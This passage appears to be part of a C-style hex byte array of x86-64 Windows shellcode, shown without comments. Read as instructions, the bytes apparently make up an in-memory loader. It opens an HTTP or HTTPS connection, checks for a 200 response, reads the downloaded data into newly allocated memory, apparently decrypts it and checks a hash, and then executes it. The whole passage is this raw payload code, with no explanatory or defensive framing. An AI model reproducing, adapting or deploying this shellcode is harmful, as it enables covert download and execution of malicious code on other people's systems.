10 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x34, 0x00, 0x00, 0x48, 0x89, 0x45,
11 0xd0, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x07, 0x48, 0x83, 0x7d, 0xd0,
12 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xf5, 0x03, 0x00,
13 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45,
14 0xd8, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00,
15 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xc8,
16 0x48, 0x83, 0x7d, 0xc8, 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff,
17 0xe9, 0xc1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89,
18 0xc2, 0x48, 0x8b, 0x45, 0xc8, 0x49, 0x89, 0xd0, 0x48, 0x8b, 0x55, 0x10,
19 0x48, 0x89, 0xc1, 0xe8, 0xf4, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xc8,
20 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x41,
21 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89,
22 0xc1, 0xe8, 0x8a, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05,
23 0x30, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xe8,
24 0x8b, 0x00, 0x89, 0xc0, 0x4c, 0x8d, 0x80, 0xd0, 0xfd, 0xff, 0xff, 0x48,
25 0x8b, 0x45, 0xe8, 0x48, 0x8d, 0x50, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48,
26 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x4d, 0xc0, 0x4d, 0x89, 0xc1, 0x49, 0x89,
27 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x36, 0x3d, 0x00, 0x00, 0x48, 0x8b, 0x45,
28 0xe8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x8d, 0x8a,
29 0x18, 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xfd, 0x39, 0x00, 0x00,
30 0x48, 0x89, 0x45, 0xb8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x18,
31 0x07, 0x00, 0x00, 0x48, 0x3b, 0x45, 0xb8, 0x0f, 0x85, 0x58, 0x02, 0x00,
32 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45,
33 0xe8, 0x48, 0x8b, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8,
34 0x48, 0x89, 0xc1, 0xe8, 0x35, 0x33, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
35 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x48,
36 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff,
37 0xff, 0xe9, 0xd0, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
38 0x00, 0xeb, 0x2a, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x8b,
39 0x55, 0xfc, 0x48, 0xc1, 0xe2, 0x05, 0x48, 0x8d, 0x8a, 0x30, 0x02, 0x00,
40 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08,
41 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45,
42 0xe8, 0x8b, 0x80, 0x34, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0xc7,
43 0xc7, 0x45, 0xfc, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x54, 0x48, 0x8b, 0x45,
44 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc,
45 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x14, 0xd0, 0x48, 0x8b, 0x45, 0xe8,
46 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xa2, 0x32, 0x00, 0x00, 0x48,
47 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc, 0x48, 0x83, 0xc2,
48 0x06, 0x48, 0x89, 0x0c, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc,
49 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x04, 0xd0, 0x48, 0x85, 0xc0, 0x0f,
50 0x84, 0x7f, 0x01, 0x00, 0x00, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45,
51 0xe8, 0x8b, 0x80, 0x30, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0x9d,
52 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8,
53 0x02, 0x75, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x10,
54 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x4c, 0x01, 0x00, 0x00, 0x48,
55 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
56 0x75, 0x10, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00,
57 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
58 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45,
59 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x50,
60 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x33, 0x00, 0x00,
61 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75, 0x13, 0x48, 0x8b, 0x45,
62 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84,
63 0xea, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8,
64 0xe8, 0x34, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75,
65 0x13, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83,
66 0xf8, 0x02, 0x0f, 0x84, 0xc5, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
67 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x74, 0x0b, 0x48, 0x8b, 0x45, 0xf0, 0x8b,
68 0x00, 0x83, 0xf8, 0x04, 0x75, 0x11, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89,
69 0xc1, 0xe8, 0xf0, 0x12, 0x00, 0x00, 0xe9, 0x9f, 0x00, 0x00, 0x00, 0x48,
70 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0b, 0x48, 0x8b,
71 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x3f, 0x48, 0x8d, 0x95,
72 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8,
73 0x5f, 0x06, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x13, 0x48, 0x8d, 0x95, 0x70,
74 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x0c,
75 0x0a, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b,
76 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x10, 0x00, 0x00, 0xeb, 0x4a,
77 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x05, 0x74, 0x0b, 0x48,
78 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x0e, 0x48, 0x8b,
79 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x91, 0x1d, 0x00, 0x00, 0xeb, 0x26,
80 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x07, 0x75, 0x1b, 0x48,
81 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x60, 0x1b, 0x00, 0x00, 0xeb,
82 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb,
83 0x01, 0x90, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00,
84 0x83, 0xf8, 0x02, 0x75, 0x67, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80,
85 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x57, 0x48, 0x8b, 0x45,
86 0xe8, 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b,
87 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00, 0x49, 0x89, 0xd0,
88 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6b, 0x35, 0x00,
89 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55,
90 0xe8, 0x48, 0x8b, 0x8a, 0x48, 0x07, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0,
91 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45,
92 0xe8, 0x48, 0xc7, 0x80, 0x48, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
93 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xe8,
94 0x49, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
95 0x20, 0x35, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x8b, 0x45, 0xd0,
96 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff,
97 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x00, 0x00,
98 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x00, 0x03, 0x00, 0x00, 0x48,
99 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0x90, 0x02,
100 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
101 0xc7, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85,
102 0x74, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x78, 0x02,
103 0x00, 0x00, 0x00, 0x02, 0x60, 0x84, 0x48, 0x8d, 0x85, 0xc0, 0x01, 0x00,
104 0x00, 0x41, 0xb8, 0x68, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
105 0x48, 0x89, 0xc1, 0xe8, 0xa4, 0x34, 0x00, 0x00, 0xc7, 0x85, 0xc0, 0x01,
106 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00,
107 0x00, 0x48, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xc0,
108 0x48, 0x89, 0x85, 0x08, 0x02, 0x00, 0x00, 0xc7, 0x85, 0xe0, 0x01, 0x00,
109 0x00, 0x00, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x10, 0x02, 0x00, 0x00, 0x00,
110 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
111 0x80, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00,
112 0x48, 0x8d, 0x8a, 0x10, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x01,
113 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x10, 0xba,
114 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00,
115 0x00, 0x00, 0x00, 0xe9, 0x5a, 0x04, 0x00, 0x00, 0x8b, 0x85, 0xd4, 0x01,
116 0x00, 0x00, 0x83, 0xf8, 0x04, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89,
117 0x85, 0x74, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00,
118 0x74, 0x0a, 0x81, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x00, 0x30, 0x80, 0x00,
119 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd0, 0x00,
120 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9,
121 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00,
122 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
123 0x85, 0x68, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x68, 0x02, 0x00, 0x00,
124 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe9, 0x03, 0x00,
125 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd8,
126 0x00, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00, 0x74, 0x08,
127 0x41, 0xb8, 0xbb, 0x01, 0x00, 0x00, 0xeb, 0x06, 0x41, 0xb8, 0x50, 0x00,
128 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d,
129 0x68, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00,
130 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
131 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
132 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
133 0x85, 0x60, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x60, 0x02, 0x00, 0x00,
134 0x00, 0x0f, 0x84, 0xb1, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02,
135 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
136 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x92, 0x10, 0x06, 0x00, 0x00, 0x4c,
137 0x8d, 0x45, 0xc0, 0x48, 0x8b, 0x8d, 0x60, 0x02, 0x00, 0x00, 0x48, 0xc7,
138 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x78, 0x02, 0x00,
139 0x00, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,
140 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
141 0xb9, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x89, 0xd2, 0xff, 0xd0, 0x48, 0x89,
142 0x85, 0x58, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x58, 0x02, 0x00, 0x00,
143 0x00, 0x0f, 0x84, 0x2b, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00,
144 0x00, 0x00, 0x74, 0x4f, 0x8b, 0x85, 0x78, 0x02, 0x00, 0x00, 0x25, 0x00,
145 0x10, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x40, 0xc7, 0x85, 0x54, 0x02, 0x00,
146 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0x02, 0x00, 0x00, 0x80,
147 0x33, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
148 0x80, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x3c, 0x02, 0x00, 0x00,
149 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00,
150 0x00, 0x49, 0x89, 0xd0, 0xba, 0x1f, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
151 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x00, 0x01, 0x00,
152 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
153 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8,
154 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85,
155 0xc0, 0x0f, 0x84, 0x81, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00,
156 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00,
157 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
158 0x80, 0x08, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x34, 0x02, 0x00, 0x00,
159 0x48, 0x8d, 0x95, 0x30, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02,
160 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x4d,
161 0x89, 0xc1, 0x49, 0x89, 0xd0, 0xba, 0x13, 0x00, 0x00, 0x20, 0xff, 0xd0,
162 0x85, 0xc0, 0x0f, 0x84, 0x2c, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x30, 0x02,
163 0x00, 0x00, 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x1b, 0x01, 0x00,
164 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x48,
165 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x80, 0x40, 0x07, 0x00,
166 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00,
167 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02,
168 0x00, 0x00, 0x4c, 0x8d, 0x82, 0x40, 0x07, 0x00, 0x00, 0x48, 0x8d, 0x95,
169 0x34, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x48,
170 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd1, 0xba,
171 0x05, 0x00, 0x00, 0x20, 0xff, 0xd0, 0x85, 0xc0, 0x0f, 0x84, 0xba, 0x00,
172 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80,
173 0x40, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xa3, 0x00, 0x00,
174 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48,
175 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07,
176 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30,
177 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2,
178 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x89, 0x90, 0x48, 0x07,
179 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80,
180 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x53, 0xc7, 0x85, 0x38,
181 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02,
182 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
183 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x41,
184 0x89, 0xd2, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92,
185 0x48, 0x07, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x38, 0x02, 0x00, 0x00, 0x48,
186 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x45, 0x89, 0xd0,
187 0xff, 0xd0, 0x89, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90,
188 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b,
189 0x95, 0x58, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
190 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00,
191 0x48, 0x8b, 0x95, 0x60, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0,
192 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00,
193 0x00, 0x00, 0x48, 0x8b, 0x95, 0x68, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1,
194 0xff, 0xd0, 0x83, 0xbd, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x99,
195 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
196 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x48, 0x02, 0x00, 0x00,
197 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x80, 0x40, 0x07,
198 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x90,
199 0x30, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48,
200 0x05, 0x20, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x48, 0x02, 0x00, 0x00,
201 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x35,
202 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
203 0x28, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18,
204 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xca, 0x31, 0x00, 0x00, 0x48,
205 0x89, 0x85, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48, 0x02, 0x00,
206 0x00, 0x48, 0x8b, 0x80, 0x08, 0x19, 0x00, 0x00, 0x48, 0x3b, 0x85, 0x40,
207 0x02, 0x00, 0x00, 0x74, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x06,
208 0x8b, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x00, 0x03, 0x00,
209 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48,
210 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xc7, 0x45, 0xf4, 0x00, 0x00,
211 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
212 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x10,
213 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89,
214 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x48,
215 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48,
216 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xf7,
217 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x18, 0x01,
218 0x00, 0x00, 0x4c, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81,
219 0xc2, 0x2c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1,
220 0x1c, 0x04, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4,
221 0x00, 0x0f, 0x88, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48,
222 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x55,
223 0x18, 0x4c, 0x8d, 0x4a, 0x08, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82,
224 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x4c, 0x8d, 0x52, 0x04,
225 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x0a, 0x4c, 0x89, 0xd2, 0xff, 0xd0,
226 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x6c, 0x48, 0x8b, 0x45,
227 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50,
228 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x48, 0x8d, 0x55, 0xc4,
229 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x5f, 0x8b,
230 0x45, 0xc4, 0x85, 0xc0, 0x74, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
231 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55,
232 0x18, 0x4c, 0x8d, 0x4a, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82,
233 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x92, 0x4c,
234 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c,
235 0x89, 0xd2, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0xeb, 0x19, 0x48, 0x8b, 0x45,
236 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0b, 0x48,
237 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d,
238 0xf4, 0x00, 0x79, 0x43, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x10,
